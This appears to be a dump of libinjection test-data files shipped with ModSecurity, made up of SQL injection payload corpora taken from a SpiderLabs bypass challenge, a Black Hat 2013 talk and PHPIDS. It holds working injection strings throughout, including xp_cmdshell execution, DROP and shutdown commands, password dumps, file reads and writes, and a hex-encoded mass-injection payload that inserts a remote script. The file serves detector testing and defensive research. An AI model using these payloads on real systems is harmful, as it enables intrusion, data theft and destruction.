faf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaf%23%0A%23fdsafdsafa%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaafv%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%23fafsfaaf%0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201 # http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html # Bypass #7 %40%40new%20union%23sqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsqlmapsql%0Aselect%201,2,database%23sqlmap%0A%28%29 # http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html # Bypass #8 -2%20div%201%20union%20all%23hack%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23hpys%20player%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%0A%23fabuloso%23modsec%0A%23hpys%20player%0A%23fabuloso%23great%23%0A%23fabuloso%23great%23%0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201 # http://blog.spiderlabs.com/2011/07/modsecurity-sql-injection-challenge-lessons-learned.html # Bypass #9 1%0bAND(SELECT%0b1%20FROM%20mysql.x) modsecurity-v3.0.4/others/libinjection/data/sqli-rsalgado-bhusa2013.txt0000644000175000017500000001642213607066311026314 0ustar zimmerlezimmerle# # from # Roberto Salgado # SQLi Optimization and Obfuscation Techniques # Black Hat USA 2013 # # # Slide 47 - Optimizing Queries MSSQL # (note: slightly reworked to put in SQLi format) # 1 UNION SELECT table_name + ', ' FROM information_schema.tables FOR XML PATH('') # # Slide 48 - Optimizing Queries Oracle # (note: slightly reworked to put in SQLi format) # 1 UNION SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables # # Slide 49 - Optimizing Queries PSQL # (note: slightly reworked to put in SQLi format) # 1 UNION SELECT array_to_json(array_agg(tables))::text FROM (SELECT schemaname, relname FROM pg_stat_user_tables) AS tables LIMIT 1 # # Slide 50 - Optimizing Queries MSSQL # IF EXISTS (SELECT 1 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME='TMP_DB') DROP TABLE TMP_DB DECLARE @a varchar(8000) IF EXISTS(SELECT * FROM dbo.sysobjects WHERE id = object_id (N'[dbo].[xp_cmdshell]') AND OBJECTPROPERTY (id, N'IsExtendedProc') = 1) BEGIN CREATE TABLE %23xp_cmdshell (name nvarchar(11), min int, max int, config_value int, run_value int) INSERT %23xp_cmdshell EXEC master..sp_configure 'xp_cmdshell' IF EXISTS (SELECT * FROM %23xp_cmdshell WHERE config_value=1)BEGIN CREATE TABLE %23Data (dir varchar(8000)) INSERT %23Data EXEC master..xp_cmdshell 'dir' SELECT @a='' SELECT @a=Replace(@a%2B'
'%2Bdir,'

','') FROM %23Data WHERE dir>@a DROP TABLE %23Data END ELSE SELECT @a='xp_cmdshell not enabled' DROP TABLE %23xp_cmdshell END ELSE SELECT @a='xp_cmdshell not found' SELECT @a AS tbl INTO TMP_DB-- # # Slide 54 - Optimizing Queries - More Single Liners # ( 1 OR 1#"OR"'OR''='"="'OR''=' # # Slide 55 # 1 OR 1#"OR"'OR''='"="'OR''=' # # Slide 61 # 1!=0--+"!="'!=' # # Slide 64 How to confuse an Admin # 1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from(@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53),0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),! !true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-floor(pi()))),0x6d7973716c))from(select--(select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO) # # Slide 74 (MySQL Obfuscation) # 1.UNION SELECT 2 3.2UNION SELECT 2 1e0UNION SELECT 2 SELECT\N/0.e3UNION SELECT 2 1e1AND-0.0UNION SELECT 2 1/*!12345UNION/*!31337SELECT/*!table_name*/ {ts 1}UNION SELECT.`` 1.e.table_name SELECT $.`` 1.e.table_name SELECT{_ .``1.e.table_name} SELECT LightOS . ``1.e.table_name LightOS) SELECT information_schema 1337.e.tables 13.37e.table_name SELECT 1 from information_schema 9.e.table_name # # Slide 75 (MSSQL Obfuscation) # .1UNION SELECT 2 1.UNION SELECT.2alias 1e0UNION SELECT 2 1e1AND-1=0.0UNION SELECT 2 SELECT 0xUNION SELECT 2 SELECT\UNION SELECT 2 \1UNION SELECT 2 SELECT 1FROM[table]WHERE\1=\1AND\1=\1 SELECT"table_name"FROM[information_schema].[tables] # # Slide 76 (Oracle Obfuscation) # 1FUNION SELECT 2 1DUNION SELECT 2 SELECT 0x7461626c655f6e616d65 FROM all_tab_tables SELECT CHR(116) || CHR(97) || CHR(98) FROM all_tab_tables SELECT%00table_name%00FROM%00all_tab_tables # # Slide 77 (Bypassing Firewalls, General Tips) # 1 UNION SELECT GROUP_CONCAT(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES CASE WHEN BINARY TRUE THEN TRUE END IS NOT UNKNOWN HAVING TRUE FOR UPDATE # # Slide 78 (Modsecurity) # -2 div 1 union all #in%0a#between comments%0a#in%0a#between comments%0aselect 0x00, 0x41 like/*!31337table_name*/,3 from information_schema.tables limit 1 # # Slide 79 (Modsecurity) # CASE WHEN BINARY TRUE THEN TRUE END IS UNKNOWN FOR UPDATE UNION SELECT MATTRESSES # # Slide 80 (Fortinet) # (Skipped since specific to Fortinet) #S%A0E%B1L%C2E%D3C%E4T%F6 1 U%FFNION SEL%FFECT 2 # # Slide 81 (GreenSQL) # -1 UNION SELECT table_name FROM information_schema.tables limit 1 1 AND 1=0 UNION SELECT table_name FROM information_schema.tables limit 1 1 AND 1=0.e1 UNION SELECT table_name FROM information_schema.tables limit 1 1 AND 1= binary 1 UNION SELECT table_name FROM information_schema.tables limit 1 IF((SELECT mid(table_name,1,1) FROM information_schema.tables limit 1) =‘C’,1,2) # # Slide 83 (libinjection) # -1 UNION SELECT table_name Websec FROM information_schema.tables LIMIT 1 -1 UNION%0ASELECT table_name FROM information_schema.tables LIMIT 1 # note changed "FROM table" to "FROM table_name" # and "column" to "column_name" -1fUNION SELECT column_name FROM table_name 1; DECLARE @test AS varchar(20); EXEC master.dbo.xp_cmdshell 'cmd' -[id] UNION SELECT table_name FROM information_schema.tables LIMIT 1 {d 2} UNION SELECT table_name FROM information_schema.tables LIMIT 1 # # Slide 84 (libinjection) # 1 between 1 AND`id` having 0 union select table_name from information_schema.tables 1 mod /*!1*/ union select table_name from information_schema.tables-- true is not unknown for update union select table_name from information_schema.tables test'-1/1/**/union(select table_name from information_schema.tables limit 1,1) -1 union select @``"", table_name from information_schema.tables -1 LOCK IN SHARE MODE UNION SELECT table_name from information_schema.tables $.``.id and 0 union select table_name from information_schema.tables -(select @) is unknown having 1 UNION select table_name from information_schema.tables /*!911111*//*!0*/union select table_name x from information_schema.tables limit 1 -1.for update union select table_name from information_schema.tables limit 1 -0b01 union select table_name from information_schema.tables limit 1 12 union select table_name from information_schema.tables limit 1 -1 procedure analyse(1gfsdgfds, sfg) union select table_name from information_schema.tables limit 1 modsecurity-v3.0.4/others/libinjection/data/sqli-phpids.txt0000644000175000017500000003377713607066311024415 0ustar zimmerlezimmerle# # Various samples from PHPIDS # %22+OR+1%3D1%23 %3B+DROP+table+Users+-- admin%27-- SELECT+%2F%2A%2132302+1%2F0%2C+%2A%2F+1+FROM+tablename 10%3BDROP+members+-- SELECT+CHAR%280x66%29 SELECT+LOAD_FILE%280x633A5C626F6F742E696E69%29 EXEC%28%40stored_proc+%40param%29 chr%2811%29%7C%7Cchr%2812%29%7C%7Cchar%2813%29 1+or+name+like+%27%25%27 1+OR+%271%27%21%3D0 1+OR+ASCII%282%29+%3D+ASCII%282%29 1%27+OR+1%26%221 1%27+OR+%271%27+XOR+%270 1+OR%2B1%3D1 1+OR%2B%281%29%3D%281%29 aaa%27+or+%281%29%3D%281%29+%23%21asd aaa%27+OR+%281%29+IS+NOT+NULL+%23%21asd a%27+or+1%3D%271 asd%27+union+%28select+username%2Cpassword+from+admins%29+where+id%3D%271 1%27%3B+WAITFOR+TIME+%2717%3A48%3A00+%27+shutdown+--+-a 1%27%3B+anything%3A+goto+anything+--+-a %27+%3D%2B+%27 asd%27+%3D-+%28-%27asd%27%29+--+-a aa%22in%2B+%28%22aa%22%29+or+-1+%21%3D+%220 aa%22+%3D%2B+-+%220++ aa%27+LIKE+0+--+-a aa%27+LIKE+md5%281%29+or+%271 aa%27+REGEXP-+md5%281%29+or+%271 aa%27+DIV%401+%3D+0+or+%271 aa%27+XOR-+column+%21%3D+-%270 union+select+password+from+users+where+1 str%27%3Dversion%28%29%0A%09%09%09%09%09%09UNION%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09%23%0A%09%09%09%09%09%09SELECT+group_concat%28table_name%29%23%0A%09%09%09%09%09%09%23%23%0A%09%09%09%09%09%09%2F%2A%21FROM%2A%2F+information_schema.tables+WHERE+%271 asd%22or-1%3D%22-1 asd%22or%211%3D%22%211 asd%22or%21%281%29%3D%221 asd%22or%401%3D%22%401 asd%22or-1+XOR%220 asd%22+or+ascii%281%29%3D%2249 asd%22+or+md5%281%29%5E%221 asd%22+or+table.column%5E%221 asd%22+or+%40%40version%5E%220 asd%22+or+%40%40global.hot_cache.key_buffer_size%5E%221 1%22OR%21%22a 1%22OR%21%220 1%22OR-%221 1%22OR%40%221%22+IS+NULL+%231+%21+%28with+unfiltered+comment+by+tx+%3B%29 1%22OR%21%28false%29+%231+%21 1%22OR-%28true%29+%23a+%21 1%22+INTO+OUTFILE+%22C%3A%2Fwebserver%2Fwww%2Freadme.php asd%27+or+md5%285%29%5E%271+ asd%27+or+column%5E%27-1+ asd%27+or+true+--+a %5C%22asd%22+or+1%3D%221 a+1%27+or+if%28-1%3D-1%2Ctrue%2Cfalse%29%23%21 aa%5C%5C%22aaa%27+or+%271 %27+or+id%3D+1+having+1+%231+%21 %27+or+id%3D+2-1+having+1+%231+%21 aa%27or+null+is+null+%23%28 aa%27or+current_user%21%3D%27+1 aa%27or+BINARY+1%3D+%271 aa%27or+LOCALTIME%21%3D%270 aa%27like-%27aa aa%27is%5CN%7C%21%27 %27is%5CN-%21%27 asd%27%7Ccolumn%26%26%271 asd%27%7Ccolumn%21%3D%27 aa%27or+column%3Dcolumn+--+%23aa aa%27or+column%2Acolumn%21%3D%270 aa%27or+column+like+column+--+%23a 0%27%2Acolumn+is+%5CN+-+%271 1%27%2Acolumn+is+%5CN+or+%271 1%27%2A%40a+is+%5CN+-+%27 1%27%2A%40a+is+%5CN+or+%271 1%27+-1+or%2B1%3D+%27%2B1+ 1%27+-1+-+column+or+%271+ 1%27+-1+or+%271 +%281%29or%281%29%3D%281%29+ fo%22o%27or%271 %27+OR+UserID+IS+NOT+2 %27+OR+UserID+IS+NOT+NULL %27+OR+UserID+%3E+1 %27++OR+UserID+RLIKE++%27.%2B%27+ %27OR+UserID+%3C%3E+2 1%27+union+%28select+password+from+users%29+--+-a 1%27+union+%28select%271%27%2C%272%27%2Cpassword+from+users%29+--+-a 1%27+union+all+%28select%271%27%2Cpassword+from+users%29+--+-a aa%27%21%3D%271 aa%27%21%3D%7E%271 aa%27%3D%28%27aa%27%29%23%28 aa%27%7C%2B%271 aa%27%7C%21%27aa aa%27%5E%21%27aa+ abc%27+%3D+%21%21%270 abc%27+%3D+%21%21%21%21%270 abc%27+%3D+%21%21%21%21%21%21%21%21%21%21%21%21%21%21%270 abc%27+%3D+%210+%3D+%21%21%270 abc%27+%3D+%210+%21%3D+%21%21%21%270 abc%27+%3D+%21%2B0+%21%3D+%21%270+ aa%27%3D%2B%271 %27%3Bif+1%3D1+drop+database+test--+-a %27%3Bif+1%3D1+drop+table+users--+-a %27%3Bif+1%3D1+shutdown--+-a %27%3B+while+1%3D1+shutdown--+-a %27%3B+begin+shutdown+end--+-a+ %27%2BCOALESCE%28%27admin%27%29+and+1+%3D+%211+div+1%2B%27 %27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%211+div+1%2B%27 %27%2BCOALESCE%28%27admin%27%29+and+%40%40version+%3D+%21%40%40version+div+%40%40version%2B%27 %27%2BCOALESCE%28%27admin%27%29+and+1+%3D%2B1+%3D+%21true+div+%40%40version%2B%27 foo%27div+count%28select%60pass%60from%28users%29where+mid%28pass%2C1%2C1%29rlike+lower%28conv%2810%2Cpi%28%29%2Api%28%29%2Cpi%28%29%2Api%28%29%29%29+%29-%270 1-%23canvas%0A++++++++++++++++++++++++%28SELECT+1%2A1+from%28information_schema.tables%29+group+by+table_name+having+-+left%28hex%28table_name%29%2Ctrue%29+%3D+-7%29 str%23%27+UNION+SELECT+group_concat%28table_name%29%0A++++++++++++++++++++++++FROM%60information_schema%60.tables aa%27in+%280%29%23%28 aa%27%21%3Dascii%281%29%23%28 %27+or+SOUNDEX+%281%29+%21%3D+%270 aa%27RLIKE+BINARY+0%23%28 aa%27or+column%21%3D%271 aa%27or+column+DIV+0+%3D0+%23 aa%27or+column%2B%281%29%3D%271 aa%27or+0%21%3D%270 aa%27LIKE%270 aa%27or+id+%3D%27%5C%27 1%27%3Bdeclare+%40%23+int%3Bshutdown%3Bset+%40%23+%3D+%271 1%27%3Bdeclare+%40%40+int%3Bshutdown%3Bset+%40%40+%3D+%271 asd%27+or+column%26%26%271 asd%27+or+column%3D+%211+and%2B1%3D%271 aa%27%21%3Dascii%281%29+or-1%3D-%271 a%27IS+NOT+NULL+or%2B1%3D%2B%271 aa%27in%28%27aa%27%29+or-1%21%3D%270 aa%27+or+column%3D%2B%211+%231 aa%27+SOUNDS+like%2B%271 aa%27+REGEXP%2B%270 aa%27+like%2B%270 -1%27%3D-%27%2B1 %27%3D%2B%27 aa%27+or+stringcolumn%3D+%2B%211+%231+ aa%27+or+anycolumn+%5E+-%271 aa%27+or+intcolumn+%26%26+%271 asd%27+or+column%26%26%271 asd%27+or+column%3D+%211+and%2B1%3D%271 aa%27+or+column%3D%2B%211+%231 aa%27IS+NOT+NULL+or%2B1%5E%2B%270 aa%27IS+NOT+NULL+or+%2B1-1+xor%270 aa%27IS+NOT+NULL+or%2B2-1-1-1+%21%3D%270 aa%27%7C1%2B1%3D%282%29Or%281%29%3D%271 aa%27%7C3%21%3D%274 aa%27%7Cascii%281%29%2B1%21%3D%271 aa%27%7CLOCALTIME%2A0%21%3D%271+ asd%27+%7C1+%21%3D+%281%29%23aa %27+is+99999+%3D+%27 %27+is+0.00000000000+%3D+%27 1%27%2Acolumn-0-%270 1%27-%40a+or%271 a%27-%40a%3D%40a+or%271 aa%27+%2A%40var+or+1+SOUNDS+LIKE+%281%29%7C%271 aa%27+%2A%40var+or+1+RLIKE+%281%29%7C%271+ a%27+or%7Ecolumn+like+%7E1%7C%271 %27%3C%7E%27 a%27-1.and+%271 aa%27%2F1+DIV+1+or%2B1%3D%2B%271+ aa%27%260%2B1%3D%27aa aa%27+like%280%29+%2B+1--+-a+ aa%27%5E0%2B0%3D%270 aa%27%5E0%2B0%2B1-1%3D%280%29--+-a aa%27%3C3%2B1+or%2B1%3D%2B%271 aa%27%251%2B0%3D%270 %27%2F1%2F1%3D%27 +aa%27%2F1+or+%271 +aa1%27+%2A+%40a+or+%271+%27%2F1+regexp+%270 +%27+%2F+1+%2F+1+%3D%27 +%27%2F1%3D%27 +aa%27%260%2B1+%3D+%27aa +aa%27%26%2B1%3D%27aa +aa%27%26%281%29%3D%27aa +aa%27%5E0%2B0+%3D+%270 +aa%27%5E0%2B0%2B1-1+%3D+%280%29--+-a +aa%27%5E%2B-3+or%271 +aa%27%5E0%21%3D%271 +aa%27%5E%280%29%3D%270 +aa%27+%3C+%283%29+or+%271 +aa%27+%3C%3C3+or%271 +aa%27-%2B%211+or+%271 +aa%27-%211+like%270 +aa%27+%25+1+or+%271 +aa%27+%2F+%271%27+%3C+%273 +aa%27+%2F+%2B1+%3C+%273 +aa%27+-+%2B+%21+2+%21%3D+%2B+-+%271 +aa%27+-+%2B+%21+1+or+%271 +aa%27+%2F+%2B1+like+%270 +%27+%2F+%2B+%281%29+%2F+%2B+%281%29+%3D%27 +aa%27+%26+%2B%280%29-%281%29%3D%27aa +aa%27+%5E%2B+-%280%29+%2B+-%280%29+%3D+%270 +aa%27+%5E+%2B+-+3+or+%271 +aa%27+%5E+%2B0%21%3D%271 +aa%27+%3C+%2B3+or+%271 +aa%27+%25+%2B1+or+%271 aa%27or+column%2A0+like%270 aa%27or+column%2A0%3D%270 aa%27or+current_date%2A0 1%27%2Fcolumn+is+not+null+-+%27+ 1%27%2Acolumn+is+not+%5CN+-+%27+ 1%27%5Ecolumn+is+not+null+-+%27+ aa%27+is+0+or+%271 %27+or+MATCH+username+AGAINST+%28%27%2Badmin+-a%27+IN+BOOLEAN+MODE%29%3B+--+-a %27+or+MATCH+username+AGAINST+%28%27a%2A+-%29+-%2B+%27+IN+BOOLEAN+MODE%29%3B+--+-a 1%27%2A%40a+or+%271 1%27%2Anull+or+%271 1%27%2AUTC_TIME+or+%271 1%27%2Anull+is+null+-+%27 1%27%2A%40a+is+null+-+%27 1%27%2A%40%40version%2A-0%2520%3D%2520%270 1%27%2Acurrent_date+rlike%270 aa%27%2Fcurrent_date+in+%280%29+--+-a aa%27+%2F+current_date+regexp+%270 aa%27+%2F+current_date+%21%3D+%271 1%27+or+current_date%2A-0+rlike%271 0%27+%2F+current_date+XOR+%271 %27or+not+false+%23aa 1%27+%2A+id+-+%270 1%27+%2Aid-%270 asd%27%3B+shutdown%3B+ asd%27%3B+select+null%2Cpassword%2Cnull+from+users%3B+ aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b+where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user+OPEN+tablecursor+ aa+aa%27%3B+DECLARE+tablecursor+CURSOR+FOR+select+a.name+as+c%2Cb.name+as+d%2C%28null%29from+sysobjects+a%2Csyscolumns+b%0A++++++++++++++++++++++++where+a.id%3Db.id+and+a.xtype+%3D+%28+%27u%27+%29+and+current_user+%3D+current_user%0A++++++++++++++++++++++++OPEN+tablecursor+FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+WHILE%28%40a+%21%3D+null%29%0A++++++++++++++++++++++++%40query++%3D+null%2Bnull%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2Bnull%2B+%27+SET+id%3Dnull%2C%40b+%3D+%40payload%27%0A++++++++++++++++++++++++BEGIN+EXEC+sp_executesql+%40query%0A++++++++++++++++++++++++FETCH+NEXT+FROM+tablecursor+INTO+%40a%2C%40b+END%0A++++++++++++++++++++++++CLOSE+tablecursor+DEALLOCATE+tablecursor%3B%0A++++++++++++++++++++++++and+some+text%2C+to+get+pass+the+centrifuge%3B+and+some+more+text. %40query++%3D+null%2Bnull%2Bnull%2B+%27+UPDATE+%27%2Bnull%2B%40a%2B+%27+SET%5B++%27%2Bnull%2B%40b%2B+%27+%5D++%3D+%40payload%27 asd%27+union+distinct%28select+null%2Cpassword%2Cnull+from+users%29--a+ asd%27+union+distinct+%28+select+null%2Cpassword%2C%28null%29from+user+%29--+a+ # double encoded ## DECLARE%2520%40S%2520CHAR%284000%29%3BSET%2520%40S%3DCAST%280x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%2520AS%2520CHAR%284000%29%29%3BEXEC%28%40S%29%3B DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); ## asaa%27%3BSELECT%5Basd%5DFROM%5Basd%5D ## asd%27%3B+select+%5Bcolumn%5D+from+users+ 0x31+union+select+%40%40version%2Cusername%2Cpassword+from+users+ 1+order+by+if%281%3C2+%2Cuname%2Cuid%29+ 1+order+by+ifnull%28null%2Cuserid%29+ 2%27+between+1+and+3+or+0x61+like+%27a 4%27+MOD+2+like+%270 -1%27+%2FID+having+1%3C+1+and+1+like+1%2F%271+ 2%27+%2F+0x62+or+0+like+binary+%270 0%27+between+2-1+and+4-1+or+1+sounds+like+binary+%271+ -1%27+union+%28%28select+%28select+user%29%2C%28select+password%29%2C1%2F1+from+mysql.user%29%29+order+by+%271+ -1%27+or+substring%28null%2Fnull%2C1%2Fnull%2C1%29+or+%271 1%27+and+1+%3D+hex%28null-1+or+1%29+or+1+%2F%27null+ AND+CONNECTION_ID%28%29%3DCONNECTION_ID%28%29 AND+ISNULL%281%2F0%29 MID%28%40%40hostname%2C+1%2C+1%29 CHARSET%28CURRENT_USER%28%29%29 DATABASE%28%29+LIKE+SCHEMA%28%29 COERCIBILITY%28USER%28%29%29 1%27+and+0x1abc+like+0x88+or+%270 %27-1-0+union+select+%28select+%60table_name%60+from+%60information_schema%60.tables+limit+1%29+and+%271 null%27%27null%27+find_in_set%28uname%2C+%27lightos%27+%29+and+%271 %28case-1+when+mid%28load_file%280x61616161%29%2C12%2C+1%2F+1%29like+0x61+then+1+else+0+end%29+ %27sounds+like%281%29+union%19%28select%191%2Cgroup_concat%28table_name%29%2C3%19from%19information_schema.%60tables%60%29%23%28 0%27+%271%27+like+%280%29+and+1+sounds+like+a+or+true%231 